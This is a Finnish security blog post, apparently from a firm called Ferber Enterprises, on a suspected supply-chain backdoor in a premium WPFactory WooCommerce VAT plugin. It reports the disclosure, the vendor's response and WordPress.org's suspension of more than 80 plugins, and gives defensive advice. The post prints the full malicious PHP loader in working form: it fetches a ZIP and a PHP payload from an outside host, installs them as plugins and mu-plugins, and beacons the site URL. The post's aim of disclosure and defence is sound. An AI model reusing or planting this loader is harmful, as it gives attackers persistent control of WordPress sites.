Tietoturvaloukkaus WPFactory-palvelussa: 170 000 WordPress-sivustoa vaarassa

WordPress on edelleen maailman yleisimmin käytetty sisällönhallintajärjestelmä, joka pyörittää yli 40 prosenttia kaikista verkkosivustoista. Pienten yritysten kotisivuista ja henkilökohtaisista blogeista suuriin yritysalustoihin ja verkkokauppainfrastruktuureihin, sisällönhallintajärjestelmästä on tullut modernin verkon selkäranka. Sen suosio johtuu sen joustavuudesta, avoimesta ekosysteemistä ja valtavasta määrästä käytettävissä olevia lisäosia, joilla sen toiminnallisuutta voidaan laajentaa.

Kuitenkin tämä sama ekosysteemi on myös muodostunut yhdeksi WordPressin suurimmista tietoturvahaasteista.

Ferber Enterprises:n kyberturvallisuusryhmä seuraa jatkuvasti WordPress-ekosysteemiin kohdistuvia uhkia, sillä laajennusten, teemojen tai toimitusketjujen haavoittuvuudet voivat nopeasti laajentua laajamittaisiksi tietomurroiksi, jotka vaikuttavat tuhansiin verkkosivustoihin ympäri maailmaa. Viime vuosina hyökkääjät ovat kohdentaneet hyökkäyksensä yhä useammin yksittäisten verkkosivustojen sijaan laajennusten kehittäjiin ja jakeluinfrastruktuureihin, jolloin haitallinen koodi on voinut levitä luotettavien ohjelmistopäivitysten ja virallisten latauskanavien kautta.

Tällä viikolla puhkesi laaja kohu, jonka keskipisteenä oli WPFactory, tunnettu WordPress-laajennusten kehittäjä, jonka tuotteita on asennettu yli 170 000 verkkosivustolle ympäri maailmaa. Yli 80 yritykseen liittyvää laajennusta suljettiin väliaikaisesti WordPress.org-sivustolta sen jälkeen, kun Ferber Enterprises:n kyberturvallisuusryhmä löysi epäillyn takaportin yhden laajennuksen premium-versiosta.

Tapaus on herättänyt WordPress-yhteisössä vakavia huolia ohjelmistojen toimitusketjun turvallisuudesta, lisäosien tarkastusprosesseista ja avoimen lähdekoodin ekosysteemiin kohdistuvien hyökkäysten kasvavasta kehittyneisyydestä.

Epäilyttävän liitännäisen käyttäytymisen löytäminen

Asia tuli ensimmäisen kerran esiin, kun Ferber Enterprises:n kyberturvallisuusryhmä havaitsi poikkeavaa toimintaa testatessaan WooCommerce Pro -laajennuksen EU VAT -premium-versiota, jota jaettiin suoraan sen virallisilta verkkosivuilta.

Aluksi tutkinta aloitettiin sen jälkeen, kun lisäosa oli antanut vakavan virheen asennuksen aikana. Ongelmaa selvitettäessä analyytikkomme tunnistivat epäilyttävän PHP-tiedoston nimeltä class-alg-wc-eu-vat-customer.php. Tiedoston havaittiin suorittavan käyttäytymistä, joka oli täysin ristiriidassa WooCommerce VAT -liitännäisen odotetun toiminnallisuuden kanssa.

<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Analyysimme mukaan koodi yritti:

• Lataa ulkoinen ZIP-arkisto etäpalvelimelta
• Muokkaa WordPressin ydinohjelmien hakemistoja
• Kommunikoi ulkoisen infrastruktuurin kanssa
• Toteuttaa potentiaalisesti etänä haitallisia komentoja verkkosivuilla

Nämä indikaattorit viittasivat välittömästi mahdolliseen piilotettuun takaoveen tai haitalliseen toimitusketjun kompromissiin.

Tilannetta teki erityisen huolestuttavaksi se, että laajennusta ei ollut ladattu epäviralliselta peilipalvelimelta tai laittomalta jakelupalvelimelta. Paketti oli ladattu suoraan WPFactory:n viralliselta asiakasportaalilta, mikä vahvisti epäilyjä siitä, että jakelukanava itsessään saattoi olla vaarantunut.

Me Ferber Enterprises:llä dokumentoimme tapauksen välittömästi ja käynnistimme vastuullisen ilmoitusprosessin ottamalla suoraan yhteyttä WPFactory:hen GitHubin kautta.

WPFactory vastasi aluksi, että raportissa kuvattu epäilyttävä tiedosto ja toiminta eivät kuuluneet heidän viralliseen koodikantaansa.

Yrityksen edustaja ehdotti useita vaihtoehtoisia selityksiä, mukaan lukien:

• Muokattu paikallinen asennus
• Vaarantunut verkkosivustoympäristö
• Vanhentunut liitännäisversio
• Mahdollisesti peukaloitu latauslähde

Yritys ilmoitti myös, että se ei pystynyt turvallisesti tarkastamaan toimitettua ZIP-tiedostoa, koska sen selain merkitsi arkiston mahdollisesti epäluotettavaksi.

Tietoturvatiimimme selvitti myöhemmin, että laajennus oli ladattu suoraan WPFactory:n virallisilta verkkosivuilta ja että epäilyttävä tiedosto oli edelleen olemassa, vaikka samasta lähteestä oli ladattu uusi versio 4.6.1.

Tämä seikka nousi tutkimuksen keskiöön. Jos useista virallisesta jakelukanavasta ladatuista itsenäisistä tiedostoista löytyi johdonmukaisesti sama epäilyttävä koodi, paikallisen verkkosivuston vaarantumisen mahdollisuus kävi yhä epätodennäköisemmäksi. Näistä havainnoista huolimatta WPFactory ilmoitti aluksi, ettei se pystynyt toistamaan ongelmaa omalla puolellaan, ja väitti, ettei epäilyttävää tiedostoa ollut virallisessa laajennuspaketissa.

Yritys pyysi tämän jälkeen järjestelmänvalvojan oikeuksia ja FTP-käyttöoikeuksia kyseiseen ympäristöön tutkimusten jatkamiseksi. Me Ferber Enterprises:llä hylkäsimme tämän pyynnön tietoturvasyistä. Erityisoikeuksin varustetun palvelinkäyttöoikeuden myöntäminen toimittajalle, jonka oma infrastruktuuri saattoi olla vaarantunut, olisi merkinnyt sietämätöntä turvallisuusriskiä. Sen sijaan tiimimme jatkoi teknisten todisteiden toimittamista, mukaan lukien videonäytteen, jossa näkyi epäilyttävä laajennuksen toiminta heti asennuksen jälkeen.

Tutkimuksen edetessä huoli ongelman mahdollisesta laajuudesta kasvoi. WPFactory ylläpitää laajaa laajennusvalikoimaa, joka käsittää yli 65 laajennusta ja joihin on yhteensä asennettu yli 170 000 aktiivista käyttöä. Mikä tahansa yrityksen jakeluinfrastruktuuriin kohdistuva tietomurto voisi siten aiheuttaa laajoja seurauksia koko WordPress-ekosysteemissä.

Tiimimme ilmoitti asiasta suoraan WordPress.orgille estääkseen muita käyttäjiä asentamasta mahdollisesti vaarantuneita paketteja tutkimusten ollessa vielä kesken. WordPress.org ryhtyi tämän jälkeen poikkeukselliseen toimenpiteeseen ja poisti väliaikaisesti yli 80 WPFactory-laajennusta virallisesta pakettivarastosta.

Tämä toimenpide herätti välittömästi huomiota koko WordPress-turvallisuusyhteisössä, sillä näin laajamittaiset laajennusten sulkemiset ovat suhteellisen harvinaisia ja viittaavat yleensä vakaviin ratkaisemattomiin ongelmiin. Tilanteen kärjistyttyä WPFactory myönsi myöhemmin, että ongelma vaikutti perustellulta, ja pyysi anteeksi, ettei se ollut reagoinut alkuperäiseen ilmoitukseen nopeammin. Yhtiön edustajat ilmoittivat tutkivansa asiaa aktiivisesti ja pyrkivänsä ratkaisuun. Yksi WPFactory:n sisäisesti esitetty hypoteesi viittasi siihen, että vanhentunut tai välimuistissa oleva laajennuspaketti saattoi olla tahattomasti toimitettu heidän infrastruktuurinsa kautta.

Kuitenkin kyberturvallisuustiimimme oli eri mieltä tästä arviosta. Havaittu käyttäytyminen viittasi vahvasti syvempään tietoturvaongelmaan, johon saattoi liittyä vaarantuneita koontiputkia, jakelujärjestelmiä tai luvatonta koodin injektointia ladattavien laajennusarkistojen sisällä.

Miksi tämä tapaus on merkittävä

WPFactory-kohu tuo esiin kasvavan kyberturvallisuusuhan, jota kutsutaan ohjelmistojen toimitusketjuhyökkäykseksi. Aiemmin hyökkääjät keskittyivät vaarantamaan yksittäisiä verkkosivustoja suoraan brute-force-hyökkäyksillä tai laajennusten haavoittuvuuksien avulla. Nykyään uhkatekijät kohdistavat hyökkäyksensä yhä useammin suoraan ohjelmistotoimittajiin, sillä luotettavan toimittajan vaarantaminen mahdollistaa haitallisen koodin leviämisen tuhansille verkkosivustoille samanaikaisesti.

Tätä strategiaa on jo havaittu useissa korkean profiilin kyberturvallisuustapauksissa, jotka ovat vaikuttaneet globaaleihin ohjelmistoympäristöihin viimeisen vuosikymmenen aikana. Erityisesti WordPress-ympäristössä lisäosien kehittäjät muodostavat houkuttelevia kohteita, koska ylläpitäjät luottavat lisäosiin niiden luonteeltaan ja ne toimivat usein korotetuilla käyttöoikeuksilla.

Jos virallisen jakelukanavan kautta levitettävään laajennuspakettiin pääsee haitallista koodia, kyseiset verkkosivustot saattavat tietämättään asentaa haittaohjelman itse. Epäilyttävän WPFactory-laajennuksen tapauksessa seuraukset voivat olla vakavia.

Analyysimme perusteella tunnistettu käyttäytyminen voisi teoriassa mahdollistaa hyökkääjille seuraavaa:

• Ota käyttöön lisähaittaohjelma
• Lisää SEO-roskapostia
• Luo pysyviä takaovia
• Vienti arkaluontoisia tietoja
• WordPress-asennusten etähallinta
• Säilyttää luvaton pääsy pitkiä aikoja

Tällaisten hyökkäysten vaara piilee niiden salakavaludessa. Nykyaikaiset takaportit on usein suunniteltu pysymään toimettomina kuukausia ennen aktivointiaan, mikä vaikeuttaa merkittävästi havaitsemista. Tämän kuun alussa WordPress Plugins Team sulki raportoidusti yli 30 laajennusta sen jälkeen, kun toiseen laajennussalkkuun upotettu piilotettu haitallinen koodi oli pysynyt passiivisena noin kahdeksan kuukautta ennen lopulta aktivoitumista ja SEO-roskapostin injektoimista verkkosivustoille.

Tämä suuntaus osoittaa, kuinka hyökkääjät asettavat yhä enemmän painoarvoa pysyvyydelle ja viivästetylle aktivoinnille havaitsemismekanismeilta pakenemiseksi.

WPFactory-tapaus paljastaa myös laajempia järjestelmätason turvallisuushaasteita, jotka koskevat WordPressiä kokonaisuudessaan. Laajennusten ekosysteemi on kasvanut räjähdysmäisesti viimeisen vuosikymmenen aikana, ja sekä virallisilla että kaupallisilla markkinapaikoilla on saatavilla kymmeniä tuhansia laajennuksia. Vaikka tämä ekosysteemi edistää innovaatioita ja joustavuutta, se myös monimutkaistaa turvallisuuden valvontaa huomattavasti.

Patchstackin raportin “State of WordPress Security in 2026” mukaan lähes 46% tunnettuja haavoittuvuuksia jäi korjaamatta ennen niiden julkistamista. Tämä tilastotieto kuvastaa sitä, kuinka paineet lisääntyvät niin laajennusten kehittäjien, tietoturvatutkijoiden kuin pakettivarastojen ylläpitäjienkin osalta.

Samaan aikaan virallinen WordPress-lisäosien tarkastusjono on tiettävästi nyt yli 4 000 tarkistettavaa lisäosaa. Tällaiset luvut havainnollistavat valtavaa haastetta laadunvarmistuksen ja turvallisuustarkastusten ylläpitämisessä mittakaavassa.

Monet laajennusten kehittäjät ovat pieniä tiimejä, joiden tietoturvaresurssit ovat rajalliset. Toiset taas hallinnoivat kymmeniä laajennuksia samanaikaisesti ja toteuttavat samalla aggressiivisia liiketoiminnan kasvustrategioita, joihin kuuluu yritysostoja ja tuotevalikoiman laajentamista. Myös WPFactory on äskettäin laajentunut yritysostojen kautta: se osti vuonna 2025 Extend-WP:n ja sen 19 laajennusta, minkä jälkeen se hankki myöhemmin samana vuonna WBW:n ja useita muita laajennuksia.

Nopea portfolion laajentaminen voi luoda toiminnallista monimutkaisuutta, joka vaikeuttaa koodin auditointia, infrastruktuurin hallintaa ja julkaisujen eheyden varmistamista. Hyökkääjät ovat tietoisia näistä todellisuuksista. Yhä useammin he keskittyvät hyödyntämään ohjelmistotoimittajien heikkoja toiminnallisen turvallisuuden käytäntöjä sen sijaan, että kohdistaisivat hyökkäyksensä suoraan loppukäyttäjiin.

Toimitusketjun turvallisuuden kasvava merkitys

Tällaiset tapahtumat vahvistavat kiireellistä tarvetta vahvempiin toimitusketjun turvallisuuskäytäntöihin koko WordPress-ekosysteemissä.

Ferber Enterprises:n kyberturvallisuusryhmä suosittelee lämpimästi, että laajennusten kehittäjät ottavat käyttöön useita keskeisiä suojauskeinoja, kuten:

• Salakirjoituspaketin allekirjoitus
• Turvalliset CI/CD-putket
• Pakollinen monivaiheinen tunnistautuminen
• Infrastruktuurin segmentointi
• Jatkuva eheysvalvonta
• Itsenäiset kooditarkistukset
• Toistettavat rakennusjärjestelmät

Verkkosivustojen ylläpitäjien tulisi myös vahvistaa omaa turvallisuuttaan. Jopa virallisista tai luotettavista lähteistä ladattuja lisäosia ei pidä olettaa olevan itsessään turvallisia.

Organisaatioiden, jotka hallinnoivat kriittisiä WordPress-infrastruktuureja, tulisi harkita:

• Staging-ympäristöjen ylläpito
• Lähtevän liikenteen seuranta
• Liitännäisten skannaus ennen käyttöönottoa
• Lisäosien käytön rajoittaminen
• Vähimpien oikeuksien käyttöoikeuksien hallinta
• Tiedostojen eheyden valvonta
• Hallittujen verkkosovellusten palomuurien (WAF) käyttö

Yritysympäristöissä toimitusketjun validointi on muodostumassa yhtä tärkeäksi kuin perinteinen haavoittuvuuksien hallinta. Oletus siitä, että viralliset ohjelmistokanavat ovat aina turvallisia, ei ole enää realistinen nykyisessä uhkakentässä.

Yhteisön reaktiot ja jatkuva tutkinta

Kohu levisi nopeasti WordPress-yhteisössä, kun kehittäjät, tietoturvatutkijat ja infrastruktuurin tarjoajat alkoivat keskustella asiasta julkisesti.

Tilannetta levittivät useat tunnetut hahmot ekosysteemissä, mukaan lukien kehittäjät, jotka julkaisivat luetteloita väliaikaisesti suljetuista lisäosista ja kehottivat ylläpitäjiä tarkastamaan ympäristönsä.

Sillä välin Ferber Enterprises:n tiimimme jatkaa epäilyttävien laajennusten näytteiden analysointia ja seuraa muita tietomurtojen merkkejä, jotka saattavat vaikuttaa WordPress-sivustoihin maailmanlaajuisesti.

Julkaisun hetkellä WPFactory on tunnustanut ongelman ja ilmoittanut pyrkivänsä aktiivisesti ratkaisemaan sen.

Kuitenkin monet kysymykset jäävät vaille vastausta:

• Oliko virallinen jakeluinfra vaarantunut?
• Kuinka kauan haitallisia paketteja jaettiin mahdollisesti?
• Vaikuttiko se muihin lisäosiin?
• Murrettiinko asiakastilejä tai latausjärjestelmiä?
• Saivatko hyökkääjät pysyvän pääsyn sisäiseen infrastruktuuriin?
• Voisiko ylimääräisiä lepotilassa olevia hyötykuormia vielä olla olemassa?

Kunnes nämä kysymykset on täysin ratkaistu, varovaisuus on edelleen välttämätöntä.

WordPressin turvallisuuden tulevaisuus

WPFactory-tapaus saattaa lopulta osoittautua jälleen yhdeksi tyypilliseksi esimerkiksi avoimen lähdekoodin verkkoympäristön kohtaamista kyberturvallisuushaasteista.

WordPressin avulla toimii valtava osa maailmanlaajuista Internet-taloutta. Sen vuoksi mikä tahansa laajamittainen tietoturvaloukkaus, joka koskee myös laajennusten kehittäjiä, voi saada seurauksia, jotka ulottuvat yksittäisiä verkkosivustoja pidemmälle.

Kun hyökkääjät kehittävät yhä edelleen toimintaansa toimitusketjun vaarantamisen ja huomaamattomien pysyvyystekniikoiden suuntaan, laajennusten tietoturvaa ei voida enää pitää toissijaisena asiana. Me Ferber Enterprises:llä uskomme, että tämä tapaus on tärkeä muistutus siitä, että kyberturvallisuudessa ei ole kyse pelkästään verkkosivustojen suojaamisesta, vaan myös ohjelmistojen jakeluketjun jokaisen tason turvaamisesta.

Luottamus avoimiin ekosysteemeihin riippuu läpinäkyvyydestä, nopeasta reagoinnista häiriöihin ja vahvoista operatiivisen turvallisuuden käytännöistä. WordPress-ekosysteemi on nyt tärkeässä hetkessä.

Se, miten kehittäjät, arkistojen ylläpitäjät, isännöintipalveluntarjoajat ja tietoturvatiimit reagoivat tällaisiin tapauksiin, auttaa ratkaisemaan, voiko WordPress jatkossa säilyttää niiden miljoonien yritysten ja organisaatioiden luottamuksen, jotka luottavat siihen päivittäin.